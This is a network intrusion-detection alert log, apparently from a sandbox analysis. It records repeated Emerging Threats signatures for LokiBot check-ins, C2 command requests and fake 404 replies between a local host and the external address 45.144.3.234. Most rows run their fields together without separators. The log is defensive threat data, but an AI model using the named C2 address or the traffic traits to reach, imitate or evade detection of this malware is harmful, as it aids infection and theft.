12/02/20-11:52:56.856210 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.856210 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.856210 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.856210 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:56.986978 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49748 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:57.268927 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.268927 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.268927 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.268927 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.405086 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49749 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:57.744999 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.744999 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.744999 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.744999 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:57.883454 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49750 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:58.120466 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.120466 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.120466 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.120466 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49751 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.247213 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49751 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:58.573099 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.573099 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.573099 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.573099 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49752 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.705685 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49752 | 45.144.3.234 | 192.168.2.6
12/02/20-11:52:58.978022 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49753 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.978022 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49753 | 80 | 192.168.2.6 | 45.144.3.234
12/02/20-11:52:58.978022 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49753 | 80 | 192.168.2.6 | 45.144.3.234
                                            12/02/20-11:52:58.978022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.645.144.3.234
                                            12/02/20-11:52:59.104920TCP2025483ET TROJAN LokiBot Fake 404 Response804975345.144.3.234192.168.2.6
                                            12/02/20-11:52:59.378493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.505512TCP2025483ET TROJAN LokiBot Fake 404 Response804975445.144.3.234192.168.2.6
                                            12/02/20-11:52:59.770770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.952721TCP2025483ET TROJAN LokiBot Fake 404 Response804975545.144.3.234192.168.2.6
                                            12/02/20-11:53:00.250977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.382495TCP2025483ET TROJAN LokiBot Fake 404 Response804975645.144.3.234192.168.2.6
                                            12/02/20-11:53:00.644083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.769340TCP2025483ET TROJAN LokiBot Fake 404 Response804975745.144.3.234192.168.2.6
                                            12/02/20-11:53:01.090386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.218769TCP2025483ET TROJAN LokiBot Fake 404 Response804975845.144.3.234192.168.2.6
                                            12/02/20-11:53:01.537713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.667457TCP2025483ET TROJAN LokiBot Fake 404 Response804975945.144.3.234192.168.2.6
                                            12/02/20-11:53:02.003036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.131956TCP2025483ET TROJAN LokiBot Fake 404 Response804976045.144.3.234192.168.2.6
                                            12/02/20-11:53:02.371231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.371231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.371231TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.371231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.505199TCP2025483ET TROJAN LokiBot Fake 404 Response804976145.144.3.234192.168.2.6
                                            12/02/20-11:53:02.962532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.645.144.3.234
                                            12/02/20-11:53:03.089902TCP2025483ET TROJAN LokiBot Fake 404 Response804976245.144.3.234192.168.2.6
                                            12/02/20-11:53:03.392820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.522391TCP2025483ET TROJAN LokiBot Fake 404 Response804976345.144.3.234192.168.2.6
                                            12/02/20-11:53:04.207113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.333814TCP2025483ET TROJAN LokiBot Fake 404 Response804976445.144.3.234192.168.2.6
                                            12/02/20-11:53:05.339664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.464609TCP2025483ET TROJAN LokiBot Fake 404 Response804976545.144.3.234192.168.2.6
                                            12/02/20-11:53:05.740205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.865657TCP2025483ET TROJAN LokiBot Fake 404 Response804976645.144.3.234192.168.2.6
                                            12/02/20-11:53:06.108569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.249782TCP2025483ET TROJAN LokiBot Fake 404 Response804976745.144.3.234192.168.2.6
                                            12/02/20-11:53:06.554063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.678923TCP2025483ET TROJAN LokiBot Fake 404 Response804976845.144.3.234192.168.2.6
                                            12/02/20-11:53:06.984148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.645.144.3.234
                                            12/02/20-11:53:07.107874TCP2025483ET TROJAN LokiBot Fake 404 Response804976945.144.3.234192.168.2.6
                                            12/02/20-11:53:07.369521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.495951TCP2025483ET TROJAN LokiBot Fake 404 Response804977045.144.3.234192.168.2.6
                                            12/02/20-11:53:07.847165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.981039TCP2025483ET TROJAN LokiBot Fake 404 Response804977145.144.3.234192.168.2.6
                                            12/02/20-11:53:10.181925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.313579TCP2025483ET TROJAN LokiBot Fake 404 Response804977245.144.3.234192.168.2.6
                                            12/02/20-11:53:10.569444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.708133TCP2025483ET TROJAN LokiBot Fake 404 Response804977345.144.3.234192.168.2.6
                                            12/02/20-11:53:11.023775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.152570TCP2025483ET TROJAN LokiBot Fake 404 Response804977445.144.3.234192.168.2.6
                                            12/02/20-11:53:11.449891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.577105TCP2025483ET TROJAN LokiBot Fake 404 Response804977545.144.3.234192.168.2.6
                                            12/02/20-11:53:11.948579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.645.144.3.234
                                            12/02/20-11:53:12.076914TCP2025483ET TROJAN LokiBot Fake 404 Response804977645.144.3.234192.168.2.6
                                            12/02/20-11:53:12.388055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.513310TCP2025483ET TROJAN LokiBot Fake 404 Response804977845.144.3.234192.168.2.6
                                            12/02/20-11:53:12.790593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.934709TCP2025483ET TROJAN LokiBot Fake 404 Response804977945.144.3.234192.168.2.6
                                            12/02/20-11:53:13.252513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.381217TCP2025483ET TROJAN LokiBot Fake 404 Response804978145.144.3.234192.168.2.6
                                            12/02/20-11:53:13.692641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.819814TCP2025483ET TROJAN LokiBot Fake 404 Response804978345.144.3.234192.168.2.6
                                            12/02/20-11:53:14.113855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.244583TCP2025483ET TROJAN LokiBot Fake 404 Response804978745.144.3.234192.168.2.6
                                            12/02/20-11:53:14.503418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.657266TCP2025483ET TROJAN LokiBot Fake 404 Response804978945.144.3.234192.168.2.6
                                            12/02/20-11:53:14.917886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.645.144.3.234
                                            12/02/20-11:53:15.077527TCP2025483ET TROJAN LokiBot Fake 404 Response804979145.144.3.234192.168.2.6
                                            12/02/20-11:53:15.377622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.504592TCP2025483ET TROJAN LokiBot Fake 404 Response804979345.144.3.234192.168.2.6
                                            12/02/20-11:53:15.761208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.888013TCP2025483ET TROJAN LokiBot Fake 404 Response804979545.144.3.234192.168.2.6
                                            12/02/20-11:53:16.124828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.253380TCP2025483ET TROJAN LokiBot Fake 404 Response804979745.144.3.234192.168.2.6
                                            12/02/20-11:53:16.497788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.625171TCP2025483ET TROJAN LokiBot Fake 404 Response804979945.144.3.234192.168.2.6
                                            12/02/20-11:53:16.866136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.992594TCP2025483ET TROJAN LokiBot Fake 404 Response804980045.144.3.234192.168.2.6
                                            12/02/20-11:53:17.243862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.372366TCP2025483ET TROJAN LokiBot Fake 404 Response804980245.144.3.234192.168.2.6
                                            12/02/20-11:53:17.613940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.645.144.3.234
                                            12/02/20-11:53:17.613940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.645.144.3.234
                                            12/02/20-11:53:38.961339TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.645.144.3.234
                                            12/02/20-11:53:38.961339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.645.144.3.234
                                            12/02/20-11:53:39.091333TCP2025483ET TROJAN LokiBot Fake 404 Response804986645.144.3.234192.168.2.6
                                            12/02/20-11:53:39.390389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.390389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.645.144.3.234
                                            12/02/20-11:53:39.517182TCP2025483ET TROJAN LokiBot Fake 404 Response804986745.144.3.234192.168.2.6
                                            12/02/20-11:53:39.815212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.815212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.645.144.3.234
                                            12/02/20-11:53:39.940460TCP2025483ET TROJAN LokiBot Fake 404 Response804986945.144.3.234192.168.2.6
                                            12/02/20-11:53:40.305916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.305916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.645.144.3.234
                                            12/02/20-11:53:40.432231TCP2025483ET TROJAN LokiBot Fake 404 Response804987045.144.3.234192.168.2.6
                                            12/02/20-11:53:40.669920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.669920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.645.144.3.234
